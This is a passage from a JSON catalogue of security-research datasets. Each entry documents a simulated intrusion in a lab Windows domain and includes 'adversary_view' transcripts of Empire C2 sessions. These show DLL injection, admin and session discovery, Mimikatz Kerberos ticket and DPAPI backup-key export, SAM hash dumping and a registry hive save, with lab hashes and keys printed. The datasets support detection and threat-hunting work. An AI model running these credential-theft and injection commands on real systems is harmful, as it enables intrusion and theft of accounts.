9.81 MB \nsvchost 2296 x64 NT AUTHORITY\\SYSTEM 7.45 MB \nsvchost 2316 x64 NT AUTHORITY\\LOCAL SERVICE 7.14 MB \nsvchost 2372 x64 NT AUTHORITY\\SYSTEM 6.17 MB \nsvchost 2484 x64 NT AUTHORITY\\LOCAL SERVICE 6.16 MB \nRuntimeBroker 2540 x64 MORDOR\\pgustavo 28.75 MB \nsvchost 2548 x64 NT AUTHORITY\\LOCAL SERVICE 6.89 MB \nsmartscreen 2568 x64 MORDOR\\pgustavo 27.85 MB \nsvchost 2592 x64 NT AUTHORITY\\SYSTEM 19.99 MB \nsvchost 2608 x64 NT AUTHORITY\\NETWORK SERVICE 8.35 MB \nsvchost 2644 x64 NT AUTHORITY\\SYSTEM 10.73 MB \nsvchost 2676 x64 NT AUTHORITY\\LOCAL SERVICE 13.55 MB \nWaSecAgentProv 2760 x64 NT AUTHORITY\\SYSTEM 5.63 MB \nsvchost 2776 x64 NT AUTHORITY\\SYSTEM 9.90 MB \nsvchost 2812 x64 NT AUTHORITY\\LOCAL SERVICE 5.57 MB \nsvchost 2820 x64 NT AUTHORITY\\SYSTEM 11.99 MB \nsvchost 2828 x64 NT AUTHORITY\\LOCAL SERVICE 8.51 MB \nsvchost 2920 x64 NT AUTHORITY\\SYSTEM 11.50 MB \nsihost 3104 x64 MORDOR\\pgustavo 27.69 MB \nsvchost 3256 x64 NT AUTHORITY\\NETWORK SERVICE 12.81 MB \nsvchost 3268 x64 NT AUTHORITY\\SYSTEM 24.27 MB \nsvchost 3284 x64 NT AUTHORITY\\LOCAL SERVICE 33.89 MB \nsvchost 3344 x64 NT AUTHORITY\\SYSTEM 5.10 MB \nsvchost 3372 x64 NT AUTHORITY\\LOCAL SERVICE 6.68 MB \nShellExperienceHost 3384 x64 MORDOR\\pgustavo 50.26 MB \nsvchost 3440 x64 NT AUTHORITY\\SYSTEM 15.84 MB \nWindowsAzureGuestAgent 3468 x64 NT AUTHORITY\\SYSTEM 59.33 MB \nWaAppAgent 3476 x64 NT AUTHORITY\\SYSTEM 73.09 MB \nWindowsAzureNetAgent 3544 x64 NT AUTHORITY\\SYSTEM 7.45 MB \nsvchost 3564 x64 NT AUTHORITY\\LOCAL SERVICE 4.78 MB \nNetworkWatcherAgent 3580 x64 NT AUTHORITY\\SYSTEM 12.99 MB \nsvchost 3624 x64 NT AUTHORITY\\SYSTEM 8.15 MB \nsvchost 3648 x64 NT AUTHORITY\\SYSTEM 12.23 MB \nsvchost 4240 x64 NT AUTHORITY\\SYSTEM 19.69 MB \nWUDFHost 4276 x64 NT AUTHORITY\\LOCAL SERVICE 29.04 MB \nSearchIndexer 4296 x64 NT AUTHORITY\\SYSTEM 33.70 MB \nconhost 4304 x64 MORDOR\\pgustavo 15.58 MB \ntaskhostw 4432 x64 NT AUTHORITY\\SYSTEM 36.85 MB \nsvchost 4440 x64 NT AUTHORITY\\SYSTEM 9.48 
MB \nsvchost 4616 x64 MORDOR\\pgustavo 16.36 MB \nsvchost 4628 x64 NT AUTHORITY\\SYSTEM 8.93 MB \nsvchost 4640 x64 NT AUTHORITY\\SYSTEM 19.45 MB \nsvchost 4796 x64 NT AUTHORITY\\LOCAL SERVICE 9.97 MB \nconhost 4856 x64 MORDOR\\pgustavo 15.93 MB \nsvchost 4900 x64 NT AUTHORITY\\SYSTEM 7.45 MB \nStartMenuExperienceHost 5024 x64 MORDOR\\pgustavo 61.98 MB \nsvchost 5064 x64 NT AUTHORITY\\LOCAL SERVICE 9.70 MB \nsvchost 5080 x64 NT AUTHORITY\\SYSTEM 7.20 MB \nsvchost 5148 x64 NT AUTHORITY\\NETWORK SERVICE 18.23 MB \nsvchost 5464 x64 MORDOR\\pgustavo 21.27 MB \nMicrosoftEdge 5516 x64 MORDOR\\pgustavo 65.12 MB \nsvchost 5524 x64 NT AUTHORITY\\LOCAL SERVICE 6.69 MB \nsvchost 5548 x64 NT AUTHORITY\\SYSTEM 18.43 MB \nRuntimeBroker 5596 x64 MORDOR\\pgustavo 48.75 MB \nsvchost 5640 x64 NT AUTHORITY\\SYSTEM 6.71 MB \nsvchost 5648 x64 NT AUTHORITY\\SYSTEM 8.14 MB \nsvchost 5704 x64 NT AUTHORITY\\SYSTEM 5.90 MB \nsvchost 5812 x64 NT AUTHORITY\\LOCAL SERVICE 6.93 MB \ndllhost 5976 x64 MORDOR\\pgustavo 15.26 MB \nsvchost 6008 x64 NT AUTHORITY\\LOCAL SERVICE 8.91 MB \nsvchost 6036 x64 NT AUTHORITY\\LOCAL SERVICE 6.32 MB \nsvchost 6072 x64 MORDOR\\pgustavo 33.20 MB \nRuntimeBroker 6152 x64 MORDOR\\pgustavo 24.96 MB \nTrustedInstaller 6280 x64 NT AUTHORITY\\SYSTEM 6.59 MB \nsvchost 6368 x64 NT AUTHORITY\\SYSTEM 9.77 MB \nsvchost 6488 x64 NT AUTHORITY\\SYSTEM 11.64 MB \nnotepad 6536 x64 MORDOR\\pgustavo 15.43 MB \nSecurityHealthHost 6540 x64 MORDOR\\pgustavo 15.52 MB \nfontdrvhost 6652 x64 Font Driver Host\\UMFD-3 6.01 MB \nWindowsInternal.ComposableShell.Experiences.TextInput.InputApp 6680 x64 MORDOR\\pgustavo 34.32 MB \nMicrosoftEdgeCP 6744 x64 MORDOR\\pgustavo 51.89 MB \nWmiPrvSE 6904 x64 NT AUTHORITY\\NETWORK SERVICE 10.39 MB \nMicrosoft.Photos 7044 x64 MORDOR\\pgustavo 34.66 MB \ndllhost 7084 x64 MORDOR\\pgustavo 7.86 MB \nconhost 7136 x64 NT AUTHORITY\\SYSTEM 5.40 MB \ndwm 7348 x64 Window Manager\\DWM-3 83.22 MB \nRuntimeBroker 7468 x64 MORDOR\\pgustavo 24.92 MB 
\nWindows.WARP.JITService 7620 x64 NT AUTHORITY\\LOCAL SERVICE 5.05 MB \nwinlogon 8012 x64 NT AUTHORITY\\SYSTEM 8.22 MB \nMsMpEng 8272 x64 NT AUTHORITY\\SYSTEM 102.83 MB\nsvchost 8328 x64 NT AUTHORITY\\LOCAL SERVICE 8.31 MB \nRuntimeBroker 8392 x64 MORDOR\\pgustavo 20.96 MB \nsvchost 8408 x64 MORDOR\\pgustavo 30.12 MB \nWindows.WARP.JITService 8416 x64 NT AUTHORITY\\LOCAL SERVICE 5.21 MB \nsvchost 8480 x64 NT AUTHORITY\\SYSTEM 5.68 MB \nApplicationFrameHost 8484 x64 MORDOR\\pgustavo 28.34 MB \nexplorer 8532 x64 MORDOR\\pgustavo 117.59 MB\nWUDFHost 8600 x64 NT AUTHORITY\\LOCAL SERVICE 4.83 MB \npowershell 8648 x64 MORDOR\\pgustavo 73.75 MB \nMicrosoftEdgeSH 8880 x64 MORDOR\\pgustavo 15.34 MB \npowershell 9076 x64 MORDOR\\pgustavo 121.03 MB\nrdpclip 9128 x64 MORDOR\\pgustavo 10.55 MB \ntaskhostw 9236 x64 MORDOR\\pgustavo 16.99 MB \nSearchUI 9328 x64 MORDOR\\pgustavo 211.37 MB\nSysmon 9368 x64 NT AUTHORITY\\SYSTEM 17.81 MB \nsvchost 9560 x64 NT AUTHORITY\\SYSTEM 10.84 MB \nSecurityHealthService 9640 x64 NT AUTHORITY\\SYSTEM 16.16 MB \nRuntimeBroker 9768 x64 MORDOR\\pgustavo 30.12 MB \nsvchost 9860 x64 NT AUTHORITY\\SYSTEM 5.57 MB \nunsecapp 9996 x64 NT AUTHORITY\\SYSTEM 6.41 MB \nTiWorker 10084 x64 NT AUTHORITY\\SYSTEM 27.34 MB \nsvchost 10164 x64 NT AUTHORITY\\SYSTEM 10.19 MB\n\n(Empire: 712ETU3B) > usemodule code_execution/invoke_dllinjection\n(Empire: powershell/code_execution/invoke_dllinjection) > set Dll launcher.dll \n(Empire: powershell/code_execution/invoke_dllinjection) > set ProcessID 6536\n(Empire: powershell/code_execution/invoke_dllinjection) > info\n\n Name: Invoke-DllInjection\n Module: powershell/code_execution/invoke_dllinjection\n NeedsAdmin: False\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: False\n OutputExtension: None\n\nAuthors:\n @mattifestation\n\nDescription:\n Uses PowerSploit's Invoke-DLLInjection to inject a Dll into\n the process ID of your choosing.\n\nComments:\n 
https://github.com/mattifestation/PowerSploit/blob/master/Co\n deExecution/Invoke-DllInjection.ps1\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True 712ETU3B Agent to run module on. \n ProcessID True 6536 Process ID of the process you want to \n inject a Dll into. \n Dll True launcher.dll Name of the dll to inject. This can be \n an absolute or relative path. \n\n(Empire: powershell/code_execution/invoke_dllinjection) > execute\n[*] Tasked 712ETU3B to run TASK_CMD_WAIT\n[*] Agent 712ETU3B tasked with task ID 6\n[*] Tasked agent 712ETU3B to run module powershell/code_execution/invoke_dllinjection\n(Empire: powershell/code_execution/invoke_dllinjection) > \nSystem.Diagnostics.ProcessModule (launcher.dll)\n\n(Empire: powershell/code_execution/invoke_dllinjection) >"}, "references": ["https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"]}, "SDWIN-190518224039": {"title": "Empire Find Local Admin Access", "id": "SDWIN-190518224039", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2019/05/18", "platform": ["Windows"], "type": "atomic", "tags": ["RPC OpenSCManager", "SMB Svcctl"], "description": "This dataset represents adversaries using the OpenSCManagerW Win32API call to establish a handle to the remote host and verify if the current user context has local administrator acess to the target.", "attack_mappings": [{"technique": "T1069", "sub-technique": "001", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_find_localadmin_smb_svcctl_OpenSCManager.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "find_localadmin_access", "script": 
"https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/situational_awareness/network/powerview/find_localadmin_access.py"}], "permissions_required": ["User"], "adversary_view": "(Empire: GCSKD17Z) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nGCSKD17Z ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 1112 5/0.0 2020-09-22 06:15:19 http \n\n(Empire: agents) > interact GCSKD17Z\n(Empire: GCSKD17Z) > usemodule situational_awareness/network/powerview/find_localadmin_access\n(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > execute\n[*] Tasked GCSKD17Z to run TASK_CMD_JOB\n[*] Agent GCSKD17Z tasked with task ID 8\n[*] Tasked agent GCSKD17Z to run module powershell/situational_awareness/network/powerview/find_localadmin_access\n(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > \nJob started: GL5DUX\n\n(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > back\n(Empire: GCSKD17Z) > \nWORKSTATION5.theshire.local\nWORKSTATION6.theshire.local\nMORDORDC.theshire.local\nWEC.theshire.local\n\nFind-LocalAdminAccess completed!\n\n(Empire: GCSKD17Z) >"}, "references": null}, "SDWIN-190518230752": {"title": "Empire Mimikatz Extract Kerberos Keys", "id": "SDWIN-190518230752", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2019/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["Kerberos Tickets"], "description": "This dataset represents adversaries extracting kerberos tickets from memory.", "attack_mappings": [{"technique": "T1003", "sub-technique": "004", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": 
"https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_extract_keys.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "extract_tickets", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nWE8XYD3K ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5972 5/0.0 2020-09-22 07:35:29 http \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule credentials/mimikatz/extract_tickets\n(Empire: powershell/credentials/mimikatz/extract_tickets) > info\n\n Name: Invoke-Mimikatz extract kerberos tickets.\n Module: powershell/credentials/mimikatz/extract_tickets\n NeedsAdmin: False\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n @JosephBialek\n @gentilkiwi\n\nDescription:\n Runs PowerSploit's Invoke-Mimikatz function to extract\n kerberos tickets from memory in base64-encoded form.\n\nComments:\n http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True WE8XYD3K Agent to run module on. \n\n(Empire: powershell/credentials/mimikatz/extract_tickets) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 1\n[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/extract_tickets\n(Empire: powershell/credentials/mimikatz/extract_tickets) > \nJob started: PY68ZG\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n .#####. 
mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n\nmimikatz(powershell) # standard::base64\nisBase64InterceptInput is false\nisBase64InterceptOutput is false\n\nmimikatz(powershell) # kerberos::list /export\n\n[00000000] - 0x00000012 - aes256_hmac \n Start/End/MaxRenew: 9/22/2020 3:31:24 AM ; 9/22/2020 1:31:24 PM ; 9/29/2020 3:31:24 AM\n Server Name : krbtgt/THESHIRE.LOCAL @ THESHIRE.LOCAL\n Client Name : pgustavo @ THESHIRE.LOCAL\n Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; \n * Saved to file : 0-40e10000-pgustavo@krbtgt~THESHIRE.LOCAL-THESHIRE.LOCAL.kirbi\n\n(Empire: powershell/credentials/mimikatz/extract_tickets) >"}, "references": null}, "SDWIN-190518235535": {"title": "Empire Mimikatz Backup Keys", "id": "SDWIN-190518235535", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/21", "platform": ["Windows"], "type": "atomic", "tags": ["DPAPI", "DPAPI Domain Backup key", "RPC LSARPC"], "description": "This dataset represents adversaries retrieving the DPAPI Domain Backup Key from the DC via RPC LSARPC methods over SMB.", "attack_mappings": [{"technique": "T1003", "sub-technique": null, "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "Domain DPAPI Backup Key Extraction", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip"}, {"type": "Network", "link": 
"https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "mimikatz_lsadump_backupkeys", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Domain Admin"], "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nALYH6ZB2 ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 4380 5/0.0 2020-10-22 18:24:28 http \n\n(Empire: agents) > interact ALYH6ZB2\n(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/\ncache* command dcsync_hashdump golden_ticket logonpasswords* mimitokens* purge silver_ticket \ncerts* dcsync extract_tickets keys* lsadump* pth* sam* trust_keys* \n(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/command\n(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:MORDORDC.theshire.local /export\n(Empire: powershell/credentials/mimikatz/command) > execute\n[*] Tasked ALYH6ZB2 to run TASK_CMD_JOB\n[*] Agent ALYH6ZB2 tasked with task ID 1\n[*] Tasked agent ALYH6ZB2 to run module powershell/credentials/mimikatz/command\n(Empire: powershell/credentials/mimikatz/command) > \nJob started: 75WB4S\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-2323213074-4052461197-1785501644\n\n .#####. mimikatz 2.2.0 (x64) #19041 Oct 4 2020 10:28:51\n.## ^ ##. 
\"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ## > https://blog.gentilkiwi.com/mimikatz\n'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > https://pingcastle.com / https://mysmartlogon.com ***/\n\nmimikatz(powershell) # lsadump::backupkeys /system:MORDORDC.theshire.local /export\n\nCurrent prefered key: {a0feda20-878f-4e68-ba74-d4df8f0191ab}\n * RSA key\n |Provider name : Microsoft Strong Cryptographic Provider\n |Unique name : \n |Implementation: CRYPT_IMPL_SOFTWARE ; \n Algorithm : CALG_RSA_KEYX\n Key size : 2048 (0x00000800)\n Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )\n Exportable key : YES\n Private export : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.keyx.rsa.pvk'\n PFX container : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.pfx'\n Export : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.der'\n\nCompatibility prefered key: {0343c16b-26f1-4e2c-83ed-90e443b3bfca}\n * Legacy key\ndaef8bf857ba653c7c233a1156d0fb3c488487caf7b0cb1879f6f6fd4dc3877d\n4ad77077efd018b07267585828f1e3a7e88abd203ca86d820bcd1f1f806426e2\n71834ddd67073b1e581379be55a6dd97fecee5ff9cda881936209f35653a681e\n444aedb87d2bef790e4b25084c4395372f358e226893731f621eb3f0f99153ab\n9af4c25dd32010ffe1bcac8b7ba10c6163d97b85ee19653356624068b8f01476\n77cb393bbf0fd4369a8a6982545aa2a81b70132b636218bdb9a7b7f7149d361c\n45236e528672ec9defd57430cdc0264ad6d51669715d83be2b059ec162607603\n834960f44601d4a2a02d901d67f7046b81adf702b48f8420598dd8e81fe8b1bc\n\n Export : OK - 'ntds_legacy_0_0343c16b-26f1-4e2c-83ed-90e443b3bfca.key'\n(Empire: powershell/credentials/mimikatz/command) >"}, "references": null}, "SDWIN-190519005224": {"title": "Empire Remote Get Session", "id": "SDWIN-190519005224", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/19", "modification_date": "2019/09/20", "platform": ["Windows"], 
"type": "atomic", "tags": ["RPC NetSessEnum", "SMB Srvsvc"], "description": "This dataset represents adversaries leveraging RPC SRVSVC and the method NetSessEnum over SMB to query remote hosts for active sessions", "attack_mappings": [{"technique": "T1049", "sub-technique": null, "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_getsession_dcerpc_smb_srvsvc_NetSessEnum.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/empire_getsession_dcerpc_smb_srvsvc_NetSessEnum.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "get_session", "script": "https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/situational_awareness/network/powerview.ps1"}], "permissions_required": ["User"], "adversary_view": "(Empire: WE8XYD3K) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nWE8XYD3K ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5972 5/0.0 2020-09-22 07:44:38 http \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule situational_awareness/network/powerview/get_session\n(Empire: powershell/situational_awareness/network/powerview/get_session) > info\n\n Name: Get-NetSession\n Module: powershell/situational_awareness/network/powerview/get_session\n NeedsAdmin: False\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n @harmj0y\n\nDescription:\n Execute the NetSessionEnum Win32API call to query a given\n host for active sessions on the host. 
Part of PowerView.\n\nComments:\n https://github.com/PowerShellMafia/PowerSploit/blob/dev/Reco\n n/\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True WE8XYD3K Agent to run module on. \n ComputerName False localhost The hostname or IP to query for local \n group users. \n\n(Empire: powershell/situational_awareness/network/powerview/get_session) > set ComputerName MORDORDC\n(Empire: powershell/situational_awareness/network/powerview/get_session) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 2\n[*] Tasked agent WE8XYD3K to run module powershell/situational_awareness/network/powerview/get_session\n(Empire: powershell/situational_awareness/network/powerview/get_session) > \nJob started: DV248X\n\nCName UserName Time IdleTime ComputerName\n----- -------- ---- -------- ------------\n\\\\172.18.39.5 pgustavo 0 0 MORDORDC \n\nGet-NetSession completed!\n\n(Empire: powershell/situational_awareness/network/powerview/get_session) > "}, "references": null}, "SDWIN-190625103712": {"title": "Empire Mimikatz SAM Extract Hashes", "id": "SDWIN-190625103712", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/06/25", "modification_date": "2019/09/22", "platform": ["Windows"], "type": "atomic", "tags": ["Calculating SysKey", "SAM Read", "SAM Handle Request"], "description": "This dataset represents adversaries calculating the SysKey to decrypt Security Account Mannager (SAM) database entries (from registry or hive) and get NTLM, and sometimes LM hashes of local accounts password.", "attack_mappings": [{"technique": "T1003", "sub-technique": "002", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_sam_access.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": 
"mimikatz_sam", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: WE8XYD3K) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nWE8XYD3K ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5972 5/0.0 2020-09-22 08:05:18 http \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > usemodule credentials/mimikatz/sam*\n(Empire: powershell/credentials/mimikatz/sam) > info\n\n Name: Invoke-Mimikatz SAM dump\n Module: powershell/credentials/mimikatz/sam\n NeedsAdmin: True\n OpsecSafe: True\n Language: powershell\nMinLanguageVersion: 2\n Background: True\n OutputExtension: None\n\nAuthors:\n @JosephBialek\n @gentilkiwi\n\nDescription:\n Runs PowerSploit's Invoke-Mimikatz function to extract\n hashes from the Security Account Managers (SAM) database.\n\nComments:\n http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt\n ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls\n a\n\nOptions:\n\n Name Required Value Description\n ---- -------- ------- -----------\n Agent True WE8XYD3K Agent to run module on. \n\n(Empire: powershell/credentials/mimikatz/sam) > execute\n[*] Tasked WE8XYD3K to run TASK_CMD_JOB\n[*] Agent WE8XYD3K tasked with task ID 3\n[*] Tasked agent WE8XYD3K to run module powershell/credentials/mimikatz/sam\n(Empire: powershell/credentials/mimikatz/sam) > \nJob started: Z4KLXY\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##. 
\"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n\nmimikatz(powershell) # token::elevate\nToken Id : 0\nUser name : \nSID name : NT AUTHORITY\\SYSTEM\n\n696 {0;000003e7} 1 D 27257 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Primary\n-> Impersonated !\n* Process Token : {0;0010a7df} 2 F 10859624 THESHIRE\\pgustavo S-1-5-21-4228717743-1032521047-1810997296-1104 (17g,24p) Primary\n* Thread Token : {0;000003e7} 1 D 12272014 NT AUTHORITY\\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)\n\nmimikatz(powershell) # lsadump::sam\nDomain : WORKSTATION5\nSysKey : 8e84403d1d0dcb7cac8f92c438143741\nLocal SID : S-1-5-21-2579707521-1384412784-3942915809\n\nSAMKey : 506df337a2681cb7e4c265d30250d55d\n\nRID : 000001f4 (500)\nUser : wardog\n Hash NTLM: 42ddb2963bbe8f1c075fc869d3bce33e\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n Random Value : 85c5e007a00c6fb1c5adf026cf9dd42f\n\n* Primary:Kerberos-Newer-Keys *\n Default Salt : WORKSTATION5Administrator\n Default Iterations : 4096\n Credentials\n aes256_hmac (4096) : d24867d975ac3fead7e604bc793bc32c42e4f599d0fd871cebca72444a9475a8\n aes128_hmac (4096) : d22a564882d258731c02684449a62b3c\n des_cbc_md5 (4096) : ae58aed5d5cef143\n OldCredentials\n aes256_hmac (4096) : e104dc2412faf5a1e65d1c10218130aa1d2d70d64bd103e36c6115d9f84c36c9\n aes128_hmac (4096) : eff1bddad41de0a68408261d362d1ad3\n des_cbc_md5 (4096) : 15a8dc46a16e62bf\n\n* Packages *\n NTLM-Strong-NTOWF\n\n* Primary:Kerberos *\n Default Salt : WORKSTATION5Administrator\n Credentials\n des_cbc_md5 : ae58aed5d5cef143\n OldCredentials\n des_cbc_md5 : 15a8dc46a16e62bf\n\nRID : 000001f5 (501)\nUser : Guest\n\nRID : 000001f7 (503)\nUser : DefaultAccount\n\nmimikatz(powershell) # token::revert\n* Process Token : {0;0010a7df} 2 F 10859624 
THESHIRE\\pgustavo S-1-5-21-4228717743-1032521047-1810997296-1104 (17g,24p) Primary\n* Thread Token : no token\n\n(Empire: powershell/credentials/mimikatz/sam) >"}, "references": null}, "SDWIN-190625133822": {"title": "Empire Reg Dump SAM Hive", "id": "SDWIN-190625133822", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/06/25", "modification_date": "2019/06/25", "platform": ["Windows"], "type": "atomic", "tags": ["SAM Rquest Handle"], "description": "This dataset represents adversaries with administrator privileges using the windows reg utility to dump the SAM registry hive.", "attack_mappings": [{"technique": "T1003", "sub-technique": "002", "tactics": ["TA0006"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_reg_dump_sam.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "Interactive Session", "name": "Remote Desktop Protocol", "module": null, "script": null}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: WE8XYD3K) > agents\n\n[*] Active agents:\n\nName La Internal IP Machine Name Username Process PID Delay Last Seen Listener\n---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------\nWE8XYD3K ps 172.18.39.5 WORKSTATION5 *THESHIRE\\pgustavo powershell 5972 5/0.0 2020-09-22 08:27:49 http \n\n(Empire: agents) > interact WE8XYD3K\n(Empire: WE8XYD3K) > shell reg save HKLM\\sam sam\n[*] Tasked WE8XYD3K to run TASK_SHELL\n[*] Agent WE8XYD3K tasked with task ID 5\n(Empire: WE8XYD3K) > \nThe operation completed successfully.\n\n..Command execution completed.\n\n(Empire: WE8XYD3K) >"}, "references": null}, "SDWIN-191027055035": {"title": "RDP TaskManager LSASS Dump", "id": "SDWIN-191027055035", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/10/27", "modification_date": "2020/09/21", "platform": ["Windows"], 
